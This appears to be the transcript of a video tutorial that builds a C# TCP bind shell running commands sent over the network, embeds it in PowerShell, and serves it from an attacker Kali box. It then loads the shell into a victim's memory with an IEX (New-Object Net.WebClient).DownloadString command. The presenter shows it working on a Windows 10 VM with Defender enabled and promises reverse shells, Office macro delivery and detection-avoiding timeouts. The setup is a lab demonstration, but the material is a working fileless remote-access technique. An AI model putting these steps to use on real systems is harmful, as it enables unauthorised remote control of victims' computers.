Hey guys, welcome to the channel. Today we're going to be doing coding of some C2 command and control channels. We're going to be using PowerShell and respectively C# code. So before we dive into action, it's going to be a good idea to give a brief overview of what we're going to be doing. So let's jump on that. Okay guys, so this is our very short introduction of what we're going to do. So first, let's talk over about our environment. So we have three boxes. We have Kali Linux, which is going to be attacker box, which could be done from command VM, but let's keep things separated for clearer understanding. So we're going to have Kali Linux for attacker box. We're going to also have Windows command VM, which is pretty much an offensive VM based on Windows. I'm going to put a link on their GitHub repository in the description. This is going to be also used as stacker box since we're going to be developing our exploits there. Because when you're developing exploits or malicious code or any kind of code, we can do it on Linux because nowadays PowerShell is using .NET Core 6, I believe, or 7, I'm not sure, which runs natively on Linux and Windows. But there are differences when you're talking about process and things like that. So this could be the case. We could do it on Kali Linux itself using the ability of .NET Core running natively on Linux, but to be kind of sure, because by default Windows is using .NET Framework, not .NET Core. So just to be sure that that thing is gonna run, it's better to use Command VM or Windows VM. So yeah, that's the point of the Windows VM. In future, we're gonna try it with the Linux one to see if that works. But for now, we're gonna stick to Command VM. Yeah, and then we're gonna have Windows 10 Pro, which is gonna be our victim box, the box where we're gonna be testing our code and so on. About the roadmap, this is a really simple roadmap. First, we're gonna learn how to run C# code inside a PowerShell, any C# code. Then we're gonna create a simple TCP bind server, and there's a reason for it to be bind because it's kind of easier to implement, easier to use, and it's gonna be easier to understand its concept. So we're gonna go with bind server. Then we're gonna create a script, a PowerShell script, which is gonna trigger the server, and then we can chain the things and achieve remote code execution. Now, we have future roadmap when we're gonna reverse the channel of the server. So we're gonna make a reverse server on our attacker box and we're gonna force the victim to connect to us. Yeah, and the second thing we're gonna do in future episodes is to complete the attack chain using Office macros. So we're gonna infect our script, inject our script in some kind of macros, run the macros, and then achieve the C2 command and control. Yeah, it's gonna be quite interesting. So let's jump right into it. Alright, now I'm inside my command VM box, and what I did is to generate Open Visual Studio and generate new console app. Why we want console app? Because it's the lightest template for any .NET apps there. We don't want the heavy frameworks like .NET Core and so on. We don't want to build the REST APIs. We're gonna build a server ourselves from scratch. So go ahead and create a new file with console app, new console app project, and you should come up with something like that. Console right one, hello world, just to make sure our environment works. I'm gonna run that thing. Yeah, as you can see, it outputs some string into the console. Now what I'm gonna do is to create a structure of the code. So I'm gonna add a namespace. Let's type cc, therefore add brackets, public class program, and that's because our file is called program. And then we're gonna define a main method. So public static void main, and the main method is the entry point of almost any language. Languages like Python, they do not require main method because they are interpretative language. So whenever you type, it's gonna get executed from very top to very bottom. But that's the case if you're making short scripts. If you're making a huge enterprise programs or using any kind of framework, it requires main methods as well. So the main method is pretty much the entry point of any program, and if it's missing, the compiler do not know where to start and what logic to follow. So we we specify the main method here, and we're gonna write another console write line just to make sure our code works. We're gonna say hi, and if we run this, we're gonna get hi on the screen. Yes, now let's try to get that code here and put it inside a PowerShell and execute the PowerShell, the code from PowerShell. So let's open up a new window, define a variable code which equals to our C# code, which uses that encodation syntax. This verifies that if any encodation are met inside the variable, they're gonna be ignored. So the syntax of the PowerShell do not get broken. So I'm gonna add type and specify the variable we just created, and we see some errors. We see the console do not exist in the current context. That's mostly because we are not using system here. If I add system, you can see that it's not being used, but because it gets the console write line most likely from a DLL file, that's why it's not required. But since in our PowerShell file here we don't have reference to any DLL entries, we need that system in our variable. So I'm gonna restart the PowerShell window. That way I'm flushing all the environments, all the variables with it and so on. And we're gonna copy the code again. And we're gonna do quite the same thing. Code equals quotation, paste the code, and then add type and the variable we just added. So now what I have to do is to invoke expression, quotes, and the full path of the main method. In that case, it's cc, which is the namespace. Then we have program, and then I'm executing a main. We have a hi on the terminal, so that means we successfully executed that native C# code using PowerShell. Now the next step is to find a way to execute commands using PowerShell. So here, Google come to help. We need Google. So C# execute OS command. You of course do not need to memorize all that things. You just need to use Google the right way. So that's the one we want. I'm just gonna copy. Actually, I'm just gonna make a new method. So public static void exec, and here we're gonna paste the code. So why I did it static and why I did it void? Void because we are just testing, and in the future we're gonna change that to string because we wanna need to return the output of the command. And why it's static? Because this way we would not have the need to instantiate a new object every time we need to execute something. So here we're using the directory system diagnostic process. We instantiate a new process, and it's kind of same if we're gonna cut that thing out and we use it here using like that. I think on the very low level of the language it does matter, but we are not gonna dive that deeply. So we are instantiating a new process. We are assigning a process info to it, start info, which have a lot of properties to it. So Windows start is going to be hidden, file name is going to be cmd.txt. So pretty much that means, that one here means that we're going to simulate the actions of me running Windows button and R and typing cmd.txt. Yeah. Now here we can specify a command, and let's say we want to open a notepad. So that way, what happens is if I'm typing Windows and R, cmd.txt notepad. As you can see, our cmd got popped up, and after that, our notepad window got popped up. Let's just change that to cow because it's slightly smaller, cow.txt. So what that thing does is the same thing we did manually with Windows button and R. It just opens cmd and cmd opens calculator. So if I run that, so exec, we should be able to see the calculator popping up. Yeah, there it is. The program resulted with exit code 0, which pretty much means success because we do not define any non-default status code for exit. So we see our calc, we know we can execute commands. The next thing we need to do is to make that thing dynamic and make that thing return a variable, return a string, because we do not need void when we start talking about networks and bind shells and so on. So the first thing is to make that thing dynamic. So here I'm gonna add property string cmd, and here I'm gonna cut calc and add the cmd right next to the slash c. That way, after calling exec, I can call any command I want, for example, ipconfig. So if I run that, I should be able to see the ipconfig of my system, command VM, inside that debug window. Yeah, there it is. So the next step is to pretty much make it return a string. So I'm gonna change void to string. And let's reach to Go for help once again. C# run cmd get output. We need to ctd alter direction. So here on the accepted answer, of course, who watches the question? Go for accepted answer immediately. We need string output and p wait for exit. So after the p start, after process start, we're gonna need to instantiate an output variable. We need to remove that, to rename that to process, because we're using process variable process, and that should be good. And now we should return output. And here I need to verify to actually create a variable output to be equals the result of that method. So yeah, typo. So now everything should be fine, I guess. And if everything works, we should not be able to see any kind of output. We should see 0. But that's not the case because we saw the output and we have an exception. So I think there's a property we need to add, which I don't remember the exact one. Yeah, we need a redirect standard output equals true before the process starts. So here, process start, paste that in here, stop the debugger, run that thing once again, and now we are seeing, come on, nothing. And that's the whole point, because as you can see, we don't have any console write-wise. We save all the output into a variable. So if we go ahead and type console write_line output, so now we should be able to see the output of our command. Yep, nice one. So now the next thing is to actually create a server, to create some kind of a bind shell. Then in the future episodes, we're gonna reverse the bind shell and we're gonna convert it into some kind of a C2 channel. So now we first need a bind shell, but before that, let's just try copy that code and run it in PowerShell just to make sure it works. Because if we go ahead and develop a huge piece of code, then run it into PowerShell, and if something breaks, it's going to be really harder to understand what. So it's a good idea to actually, on a checkpoint basis, try all the things you want in the PowerShell for the current case. And what I suggest is to use the ICE for PowerShell, where we can define everything we need. Let's say code, come on, code equals the same thing we did, like that. And then we're gonna add type code, and then we're gonna IX the very same thing. CC program main. So I'm gonna leave the IC open and unsaved just to save my PowerShell scripts there. I'm gonna run every time I make a change. I'm gonna run the script in a new PowerShell window, so everything is being flushed. So here I'm gonna paste my code and see what happens. We got an error, which is good. Errors are always good. Namespace cannot directly contain members, such as fields or methods. Sorry. We missed the dollar sign here. So here I'm gonna need to specify a dollar sign. Now it is the variable. No, don't save. Now it is the variable. I'm gonna instantiate a new PowerShell window, paste our code, run that. We have another error, which means we're progressing somewhere. The process object must have the usual execute property. Okay, so inside the start info, we go start info dot shell, yeah, equals to false. Yeah, okay. So now this way, I'm gonna need to edit my code here. Yep. Ah, just have it. Copy again and paste. Now we see the output of our ipconfig variable, sorry, command, and now it's time to move on into developing a server, bind server, and connecting back and do the thing over the network. So let's just minimize that and go over to Google once again, C# TCP server. On their Microsoft documentation, they have a really good explanatory of how this thing works. We're gonna use their own example. So I'm gonna need to copy that part because we don't need to try and catch any exceptions since we're doing tasks that do not require catching exceptions. For example, if we are developing a client code that's gonna need us to capture exceptions to bypass any downtime, here we don't need to do that. So I'm just gonna need to copy the code, paste it here, and we need to add a bunch of libraries, system.net, come on, .NET sockets, and I think that's it. Only two, or maybe not. Ah, yeah, I forgot to copy the TCP server. Public class, or I'm just gonna copy it here. Okay. Now we have a bind server here, which we need to change the bind IP address because this is the local host, which if we leave default like that, we won't be able to connect to the box remotely. So we need to specify 4 zeros to listen no interfaces. Or if we want, we can go ahead, type ipconfig, copy the IP, paste it here, but we need to change it really frequently because you know there's DHCP or any services that can affect your IP and assign you a different one. So the best way for now, for demonstration purpose, is to use 0000, which binds to all available interfaces. Now we're gonna need to edit the port. Let's say 8443 proxy HTTPS, and keep in mind that when we test that thing and run that thing, if you run it in a new window, new environment, you're gonna need that there will be a pop-up screen to enable a firewall rule for that. And that's because we're using a bind shell. In the future episodes where we're gonna use a reverse shell, we're gonna change the code and no pop-up should appear. So for now, just for demonstration purpose, keep it that way, keep it simple, as we're gonna explain what that piece of code does. So the first thing is to define a server, define a port, define a listening interface, and it starts the server. So we don't need that commands here. I think we don't need them. If we does, we can go back and find them in any time. Okay, so we define the data which is gonna be needed for requesting. So we define a byte array, new byte array, okay, and we define a string of data which is gonna be our request, which is that case is no. Therefore, we enter a while loop, an infinite while loop, and we wait for a connection. Whenever the connection comes here, we console write line connected and we flush the data. So that thing here is because if we go into while loop, infinite while loop, we can go with 5, 10, and more iterations, and that data can be broken somewhere from iterations and can response a bad and corrupted data. So we need to flush that variable each loop cycle. So each iteration. So here we are defining once again the objects we need. We are defining a variable I, and then we whoop and pretty much read all the data that comes in to the server. Therefore, we translate data bytes, as the comment says, pretty useful, you know. And then we print out what we received. Therefore, we pump it to upper, which pretty much we do not need. And then we define a new variable message, which is gonna be the response, which get bytes, which encodes the bytes of data and sends back the response in stream write method. Okay, so here we need to shut down the connection as the whoop ended. So here we need to add our custom logic to pretty much get the received commands from the request from Kali box and then run that command, get the output, and then send it back to Kali machine. So here our data in that case is going to be the command received from our Kali box. So here we're gonna need to run that method exec. So here we're gonna type var output. Actually, I already have it written here like that. And here we're just gonna need to specify data. So that way we're making our code dynamic. We don't need that obviously. And therefore message is gonna get encode get all bytes, not from data, not from the request body itself, but from the output of our command. In that case, it's the output variable. And now we've returned the message. We don't need that. Okay. Now, why are you red? Uh, Hello? Is my brackets good? I think not. Yeah, now we're fine. Okay, now everything should work in theory. So what happens? We run a server, we listen on our exact port on all the interfaces. Whenever the connection come, we read for the exact command, we execute that command, and we return the output. So let's test that out. I'm just gonna start the server, waiting for a connection. So we are stuck here now, and we're waiting for a connection. I'm gonna see my IP, which is 129. I'm gonna go over my Kali box. Okay. Now inside my Kali box, I'm just gonna go and type nc, paste the IP 8443 NV. Now, as you can see, the netcat confirms that the port is being open. If we go to command VM, we see that on the debug window of the program, we see we are connected. And now, if I go to Kali and type any kind of command, let's see ipconfig, for example, received ipconfig. And sometimes take a note that if you touch the terminal, the debug window, sometimes it gets frozen. So you need to manually press enter to make it run again. So here on the Kali, as you can see, we received the output of the ipconfig command. So we can use other commands like, for example, who am I, and the cycle repeats, and that's why we have an infinite loop, because we infinitely wait for a connection. Upon connection comes, we execute the commands, it returns the output, and we wait for another connection. So that's the way our bind server works, and that's a perfect example of manually writing a bind shell. So that's how a bind shell actually works. You host a server on a victim machine, then you go on the Kali box and connect to that server, no matter if it's netcat, custom client, metasploit, and so on, and you execute command on the server when the server is actively listening for your commands. The reverse shell is kind of the opposite, where the Kali machine acts as a server and the client box connects to us. So far we have successfully created some kind of a bind shell manually. Now let's try to add that thing into PowerShell and execute it that way. Therefore, we can try move onto separate Windows box and repeat the procedure and see if that thing is getting executed with Windows Defender on. So we're just gonna need to copy our code once again, go to the ICE, quite the same procedure. Paste it here. A huge piece of code. Now copy our PowerShell script and then just manually type it. As you can see, we have the screen waiting for a connection, and if we go to Kali and we run exactly the same command, we can see it works. So now what we did is to actually load all that code into memory and execute it using PowerShell. The next thing I want to cover is to a nice hacky way to execute the following script. And that way is to actually host that script on your Kali VM, on your server, on your attacker machine, sorry. So here, if I go ahead, go to my desktop, and let's say vim shell.ps1, or not shell, but let's say program.ps1. Paste the script I copied from my ICE. I'm gonna write it down. So I have successfully written the code itself, the PS1 file. So now what I can do is to host it using Python, for example, or any other web server. So Python M, Python 3M, HTTP server 80. So now if someone navigates here, he'll be able to see my PowerShell script being hosted. So there are a way of PowerShell to execute a script sitting on a remote server, and that's ix new object net.web client. So here, as you can see, I have a PowerShell script hosted. If I open a PowerShell window, close that thing, and go ahead with PowerShell no profile and execute ix new object net.web web client, download string, and specify the string we have. So here program.ps1, that's the URL of the PowerShell script there. We finish the syntax. So that way we can load our script we developed remotely in memory without downloading and touching anything to the disk. So let's see if that works. If I enter that, you can see it immediately accepts a connection. It immediately starts the listening process. So if I go to the Kali box, I can see that the requests were made. So this was my manual request with Firefox, and this is the request I made using the PowerShell. So as you can see, it automatically loads the script into memory and executes that. So following that logic, it successfully created a bind shell, and I can access it with the same way. So here, go for ipconfig. It works. As you might take note that once the script is loading, I can shut down the HTTP server and the script still gonna get executed. So we can do this using SMB server or HTTP server or any kind of server. We can use these loading techniques. So now it's a good idea to have that hosted again. Actually, let's go with tmux ifconfig python HTTP server 80. Nah, it's kind of better. Okay, so here I'm gonna make a new window for the netcat. So here I'm gonna start a new Windows VM, which is not a command, it's just a regular Windows 10 Pro. And let's see if that thing is gonna get executed, even though we have a Defender on. Okay, so with the power of video editing, you do not have to wait as I did. So all of us know about the Windows updates. It's kind of pain, but never mind, we are here. So we can test what we did into a completely renewed Windows box running Windows 10 Pro and having a Windows Defender turned on. So let's see if that payload is gonna work. Let's go ahead, open PowerShell. And now we need to copy the syntax again. So we need to go and type, actually, is it saved on my clipboard? No. Or is it? I'm not sure. Or the copy does not work. I need to install VM tools. Never mind. Yeah, never mind. Okay, so PowerShell, no profile, C, exe, new object, net.web client, download string, and then HTTP 192, 168. What was the IP address? Actually, 126, 128. Okay, and then type program.ps1. So finish the syntax here, and by theory this should work. Let's see if that defender is turned on. So set up OneDrive. I do not want OneDrive, so virus threat protection settings is being turned on. So if I run that, let's see if something happens. I don't see a request so far. Yeah, we have waiting for a connection. So the request was made here, and the PS1 script file was executed successfully. The Defender file is being turned on, the Defender program. So just to test that things work, I can go ahead and try netcat, specify the IP address of the Windows VM box, which I got it from here. That's the source of the request. And then 8443. Now, as you can see, the port is being open, and I can write as many commands as I want. Thank you guys for watching. This was a quick video of demonstrating how bind shell works. In the next videos, we're gonna reverse the logic and we're gonna force the target to connect to the attacker machine by reversing the logic we implemented now, and we're gonna make it more like of a C2 server. We're gonna add a timeout so we are harder to detect and so on. So I hope you learned something new, and see you again.